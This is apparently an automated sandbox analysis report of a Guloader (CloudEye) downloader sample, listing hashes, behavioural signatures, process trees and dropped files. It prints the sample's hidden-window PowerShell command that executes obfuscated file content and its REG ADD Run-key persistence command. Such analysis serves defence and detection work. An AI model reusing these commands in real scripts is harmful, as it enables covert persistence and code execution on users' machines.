Overview
overview
10Static
static
33b3d77d803...9c.exe
windows7-x64
103b3d77d803...9c.exe
windows10-2004-x64
10$PLUGINSDI...er.dll
windows7-x64
1$PLUGINSDI...er.dll
windows10-2004-x64
1$PLUGINSDI...ge.dll
windows7-x64
1$PLUGINSDI...ge.dll
windows10-2004-x64
1$PLUGINSDI...gs.dll
windows7-x64
3$PLUGINSDI...gs.dll
windows10-2004-x64
3Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
26-06-2024 01:10
Static task
static1
Behavioral task
behavioral1
Sample
3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/Banner.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/Banner.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/BgImage.dll
Resource
win7-20231129-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/BgImage.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win7-20240611-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win10v2004-20240508-en
General
-
Target
3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe
-
Size
489KB
-
MD5
fa45fc9a0330174313e4e08e31d22181
-
SHA1
ceb0106d1e8709456e8be6f842badbebde62b567
-
SHA256
3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c
-
SHA512
5939798d1adc2e30f4b53f8e1a2ebe670f2a34b42a6551b24fa0f86f632aeda13dea009489602d4189581cb4bae442d9aecccc3a7020886e560fc07142a61d5b
-
SSDEEP
12288:/qgow9mQ72+RS2x0mcNasY75T3vCVvMWBFbwLkM:x9mg5Sc7kvhFbwT
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Loads dropped DLL 3 IoCs
Processes:
3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exepid process 1924 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe 1924 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe 1924 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\teatertordens = "%Grandeval% -windowstyle minimized $Subereous=(Get-ItemProperty -Path 'HKCU:\\huxleian\\').Salgsenhederne;%Grandeval% ($Subereous)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 1 IoCs
Processes:
3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exedescription ioc process File created C:\Windows\SysWOW64\energetiskes\Physicianer223.lnk 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 2696 wab.exe 2696 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2724 powershell.exe 2696 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2724 set thread context of 2696 2724 powershell.exe wab.exe -
Drops file in Program Files directory 3 IoCs
Processes:
3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exedescription ioc process File opened for modification C:\Program Files (x86)\Common Files\Marrowless\Mutated.ini 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe File opened for modification C:\Program Files (x86)\Common Files\eduard.lyz 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe File opened for modification C:\Program Files (x86)\Common Files\yeastless.Rus 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe -
Drops file in Windows directory 1 IoCs
Processes:
3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exedescription ioc process File opened for modification C:\Windows\schematizers.roa 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepid process 2724 powershell.exe 2724 powershell.exe 2724 powershell.exe 2724 powershell.exe 2724 powershell.exe 2724 powershell.exe 2724 powershell.exe 2724 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2724 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2724 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exepowershell.exewab.execmd.exedescription pid process target process PID 1924 wrote to memory of 2724 1924 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe powershell.exe PID 1924 wrote to memory of 2724 1924 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe powershell.exe PID 1924 wrote to memory of 2724 1924 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe powershell.exe PID 1924 wrote to memory of 2724 1924 3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe powershell.exe PID 2724 wrote to memory of 2696 2724 powershell.exe wab.exe PID 2724 wrote to memory of 2696 2724 powershell.exe wab.exe PID 2724 wrote to memory of 2696 2724 powershell.exe wab.exe PID 2724 wrote to memory of 2696 2724 powershell.exe wab.exe PID 2724 wrote to memory of 2696 2724 powershell.exe wab.exe PID 2724 wrote to memory of 2696 2724 powershell.exe wab.exe PID 2696 wrote to memory of 2784 2696 wab.exe cmd.exe PID 2696 wrote to memory of 2784 2696 wab.exe cmd.exe PID 2696 wrote to memory of 2784 2696 wab.exe cmd.exe PID 2696 wrote to memory of 2784 2696 wab.exe cmd.exe PID 2784 wrote to memory of 2856 2784 cmd.exe reg.exe PID 2784 wrote to memory of 2856 2784 cmd.exe reg.exe PID 2784 wrote to memory of 2856 2784 cmd.exe reg.exe PID 2784 wrote to memory of 2856 2784 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe"C:\Users\Admin\AppData\Local\Temp\3b3d77d803a17ea29440f2a306de9cc86b25d9212c84f10752fa524751bf039c.exe"1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Informationsmngders155=Get-Content 'C:\Users\Admin\AppData\Local\Temp\overmandede\Metran\menubilledet\Aspalathus205.Sno';$Bygningattestens=$Informationsmngders155.SubString(71040,3);.$Bygningattestens($Informationsmngders155)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "teatertordens" /t REG_EXPAND_SZ /d "%Grandeval% -windowstyle minimized $Subereous=(Get-ItemProperty -Path 'HKCU:\huxleian\').Salgsenhederne;%Grandeval% ($Subereous)"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "teatertordens" /t REG_EXPAND_SZ /d "%Grandeval% -windowstyle minimized $Subereous=(Get-ItemProperty -Path 'HKCU:\huxleian\').Salgsenhederne;%Grandeval% ($Subereous)"5⤵
- Adds Run key to start application
- Modifies registry key
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\overmandede\Metran\menubilledet\Aspalathus205.SnoFilesize
69KB
MD5a88b20a14329d1a11a3a2c8a6abfefd7
SHA140a7ca63f9cf6ab08e4fb057cbb68814c329d440
SHA2567f5dc21864aed86bbc14e1a4e44e2f6b9cf48fef09f5d69ce4ef330dd0476606
SHA51254baf64f8ce1740ce1822fc21100f0836baa33b5340421d778de39c3a7468e615638e1a4017d49d4a08c7e0dbcff1a59143ccd18a89b87310da59bba785a2b8c
-
C:\Users\Admin\AppData\Local\Temp\overmandede\Metran\menubilledet\Deserving.InoFilesize
346KB
MD5cec7cb698dfeafe0b5548d514ab1d2f9
SHA114786f14dc829be8fb518cec820d7fc25891c90c
SHA2567a11597b9a5649a5e346b05aabcc1c965867d82d54cd4bf009e34c5d79b54016
SHA5128baecb90058b24cf0f9876219ad9eda86454ba494b717f510282b5ba3c74c2ab56f116636c6f505805293b190c6ccde1f290c98c91e9090322dd87171ab253ae
-
\Users\Admin\AppData\Local\Temp\nsy206D.tmp\Banner.dllFilesize
4KB
MD5843657eaf7240b695624dcf38bb0eb31
SHA1ca99a44e737fdeaab56f864ce1ef15a57d2eec90
SHA256b935d14c32ad8e16055f7f5794ac3411e601c5ac93155afc623f25b08e2ab82e
SHA5127773d9f6bbd17253d1c96ce225b2f9d3673969b38177afef236d1c5d4aabaae2c07793e07c34f0281ec3b859ae955e83bfe43a598ce7cc6c893ec8c9604f5de3
-
\Users\Admin\AppData\Local\Temp\nsy206D.tmp\BgImage.dllFilesize
7KB
MD5a98576f0d6b35b466cb881860977fdbc
SHA128b3dbbd76f15c876b98dce523100aa3256d193a
SHA2566cc4aadae46ee3e7f39b411ba087ec29bc10aa62b6b5b44003c934b3c51cefe2
SHA51229225bfb30e72d7d3d3571e7562b5901dbf2382af1972cc9a2be8e3bef697b9ac9e0aaac3a9bca191da827ad3cfce7f6876e8be9444663e83a7e2e86788a733c
-
\Users\Admin\AppData\Local\Temp\nsy206D.tmp\nsDialogs.dllFilesize
9KB
MD52c84faebfda2abe3b16fdf374df4272f
SHA1a5b0258a94e0440aefe1ef320e62e7a9a1c8bb40
SHA25672b38e4cca0af336655d55501c4ea05080baaa9921a62a2d717afe90bb801004
SHA512207164cc6914c59d9f4f3b8ae97628c544093ba6ecda9f8da351f453cd97e03be7a640264b8686b2d5e6f3c787f4df1d8a1ebc8e51fd788a97460cd981cc015e
-
memory/2696-61-0x0000000001C80000-0x0000000006185000-memory.dmpFilesize
69.0MB
-
memory/2696-39-0x0000000000C10000-0x0000000001C72000-memory.dmpFilesize
16.4MB
-
memory/2724-28-0x0000000072F61000-0x0000000072F62000-memory.dmpFilesize
4KB
-
memory/2724-32-0x0000000072F60000-0x000000007350B000-memory.dmpFilesize
5.7MB
-
memory/2724-31-0x0000000072F60000-0x000000007350B000-memory.dmpFilesize
5.7MB
-
memory/2724-36-0x0000000006720000-0x000000000AC25000-memory.dmpFilesize
69.0MB
-
memory/2724-37-0x0000000072F60000-0x000000007350B000-memory.dmpFilesize
5.7MB
-
memory/2724-30-0x0000000072F60000-0x000000007350B000-memory.dmpFilesize
5.7MB
-
memory/2724-29-0x0000000072F60000-0x000000007350B000-memory.dmpFilesize
5.7MB